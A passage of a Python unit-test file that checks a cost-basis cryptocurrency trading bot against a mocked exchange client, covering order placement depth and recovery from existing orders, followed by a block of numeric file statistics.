self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])
expected = {
'side': 'buy',
'size': '10.51115093',
'price': '95.14',
'type': 'limit',
'post_only': True,
}
self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])
# 3 deep now
buy_order = [x for x in auth_client_mock.orders if x['side'] == 'buy'][0]
trader.on_order_done({
'order_id': buy_order['id'],
'reason': 'filled',
'product_id': 'ETH-USD',
})
self.assertEqual(trader.current_order_depth, 3)
self.assertEqual(trader.quote_currency_paid, 2990.0390111807)
self.assertEqual(trader.base_currency_bought, 30.81520154)
self.assertEqual(len(auth_client_mock.orders), 2)
expected = {
'side': 'sell',
'size': '30.81520154',
'price': '98.0',
'type': 'limit',
'post_only': True,
}
self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])
expected = {
'side': 'buy',
'size': '10.72131821',
'price': '93.27',
'type': 'limit',
'post_only': True,
}
self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])
# Unknown order, ignore
trader.on_order_done({
'order_id': 'dummy',
'reason': 'filled',
'product_id': 'ETH-USD',
})
self.assertEqual(trader.current_order_depth, 3)
self.assertEqual(trader.quote_currency_paid, 2990.0390111807)
self.assertEqual(trader.base_currency_bought, 30.81520154)
self.assertEqual(len(auth_client_mock.orders), 2)
expected = {
'side': 'sell',
'size': '30.81520154',
'price': '98.0',
'type': 'limit',
'post_only': True,
}
self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])
expected = {
'side': 'buy',
'size': '10.72131821',
'price': '93.27',
'type': 'limit',
'post_only': True,
}
self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])
# 4 deep, sell should go out but no buy
buy_order = [x for x in auth_client_mock.orders if x['side'] == 'buy'][0]
trader.on_order_done({
'order_id': buy_order['id'],
'reason': 'filled',
'product_id': 'ETH-USD',
})
self.assertEqual(trader.current_order_depth, 4)
self.assertEqual(trader.quote_currency_paid, 3990.0163606274)
self.assertEqual(trader.base_currency_bought, 41.53651975)
self.assertEqual(len(auth_client_mock.orders), 1)
expected = {
'side': 'sell',
'size': '41.53651975',
'price': '97.02',
'type': 'limit',
'post_only': True,
}
self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])
# Sell comes in, should reset the cost basis to market
sell_order = [x for x in auth_client_mock.orders if x['side'] == 'sell'][0]
trader.place_next_orders({
'maker_order_id': sell_order['id'],
'taker_order_id': '',
'type': 'match',
'price': sell_order['price'],
'side': 'sell',
'size': sell_order['size'],
})
self.assertTrue(sell_order['id'] not in auth_client_mock.orders)
self.assertEqual(trader.current_order_depth, 0)
self.assertEqual(trader.quote_currency_paid, 0.0)
self.assertEqual(trader.base_currency_bought, 0.0)
self.assertEqual(len(auth_client_mock.orders), 2)
expected = {
'side': 'buy',
'size': '10.0',
'price': '101.0',
'type': 'stop',
'post_only': False,
}
self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])
expected = {
'side': 'buy',
'size': '10.0',
'price': '99.0',
'type': 'limit',
'post_only': True,
}
self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])
wallet_value = trader.get_available_balance('USD')
for order in auth_client_mock.orders:
wallet_value += float(order['size']) * float(order['price'])
# Make sure we actually made money...
self.assertGreater(wallet_value, 10000)
def test_recovery(self):
auth_client_mock = AuthenticatedClientRegression('ETH-USD', [100, 100, 100, 100])
auth_client_mock.get_accounts = MagicMock(return_value=[
{
'currency': 'ETH',
'available': '0',
'balance': '0',
'id': '1',
},
{
'currency': 'USD',
'available': '10000',
'balance': '10000',
'id': '2',
},
])
auth_client_mock.cancel_order = MagicMock(return_value={})
auth_client_mock.cancel_all = Mock()
auth_client_mock.get_product_ticker = MagicMock(return_value={
'price': '100',
})
trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
trader.on_start()
self.assertTrue(len(auth_client_mock.orders), 2)
self.assertEqual(trader.base_currency_bought, 0.0)
self.assertEqual(trader.quote_currency_paid, 0.0)
self.assertEqual(trader.current_order_depth, 0)
# Has seeding orders, assert orders are the same
trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
orders = [
{
'id': 'id1',
'side': 'buy',
'size': '20',
'price': '101.0',
'type': 'stop',
'product_id': 'ETH-USD',
'post_only': False,
},
{
'id': 'id1',
'side': 'buy',
'size': '20',
'price': '99.0',
'type': 'limit',
'product_id': 'ETH-USD',
'post_only': True,
},
]
auth_client_mock.orders = orders
trader.on_start()
self.assertTrue(len(auth_client_mock.orders), 2)
self.assertEqual(trader.base_currency_bought, 0.0)
self.assertEqual(trader.quote_currency_paid, 0.0)
self.assertEqual(trader.current_order_depth, 0)
self.assertEqual(auth_client_mock.orders, orders)
# Has limit buy and sell, pick up where we were
trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
orders = [
{
'id': 'id1',
'side': 'sell',
'size': '20',
'price': '101.0',
'type': 'limit',
'product_id': 'ETH-USD',
'post_only': True,
},
{
'id': 'id1',
'side': 'buy',
'size': '20',
'price': '99.0',
'type': 'limit',
'product_id': 'ETH-USD',
'post_only': True,
},
]
auth_client_mock.orders = orders
trader.on_start()
self.assertTrue(len(auth_client_mock.orders), 2)
self.assertEqual(trader.base_currency_bought, 20)
self.assertEqual(trader.quote_currency_paid, 20 * 100)
self.assertEqual(trader.current_order_depth, 2)
self.assertEqual(auth_client_mock.orders, orders)
# Has limit sell, pick up where we were
trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
orders = [
{
'id': 'id1',
'side': 'sell',
'size': '20',
'price': '101.0',
'type': 'limit',
'product_id': 'ETH-USD',
'post_only': True,
},
]
auth_client_mock.orders = orders
trader.on_start()
self.assertTrue(len(auth_client_mock.orders), 2)
self.assertEqual(trader.base_currency_bought, 20)
self.assertEqual(trader.quote_currency_paid, 20 * 100)
self.assertEqual(trader.current_order_depth, 2)
self.assertEqual(auth_client_mock.orders, orders)
# Only has buy, reset
trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
orders = [
{
'id': 'id1',
'side': 'buy',
'size': '20',
'price': '99.0',
'type': 'limit',
'product_id': 'ETH-USD',
'post_only': True,
},
]
auth_client_mock.orders = orders
trader.on_start()
self.assertTrue(len(auth_client_mock.orders), 2)
self.assertEqual(trader.base_currency_bought, 0.0)
self.assertEqual(trader.quote_currency_paid, 0.0)
self.assertEqual(trader.current_order_depth, 0)
# Weird order state, resets status
trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
orders = [
{
'id': 'id1',
'side': 'sell',
'size': '20',
'price': '101.0',
'type': 'limit',
'product_id': 'ETH-USD',
'post_only': True,
},
{
'id': 'id1',
'side': 'buy',
'size': '20',
'price': '99.0',
'type': 'limit',
'product_id': 'ETH-USD',
'post_only': True,
},
{
'id': 'id1',
'side': 'buy',
'size': '20',
'price': '99.0',
'type': 'limit',
'product_id': 'ETH-USD',
'post_only': True,
},
]
auth_client_mock.orders = orders
self.assertTrue(len(auth_client_mock.orders), 2)
self.assertEqual(trader.base_currency_bought, 0.0)
self.assertEqual(trader.quote_currency_paid, 0.0)
self.assertEqual(trader.current_order_depth, 0)
| 37.615819
| 113
| 0.521628
| 1,477
| 13,316
| 4.50914
| 0.109005
| 0.091592
| 0.113514
| 0.132132
| 0.820871
| 0.813363
| 0.780781
| 0.753153
| 0.753153
| 0.73048
| 0
| 0.049601
| 0.341394
| 13,316
| 353
| 114
| 37.72238
| 0.709806
| 0.032217
| 0
| 0.714724
| 0
| 0
| 0.123116
| 0.001942
| 0
| 0
| 0
| 0
| 0.199387
| 1
| 0.006135
| false
| 0
| 0.015337
| 0
| 0.02454
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.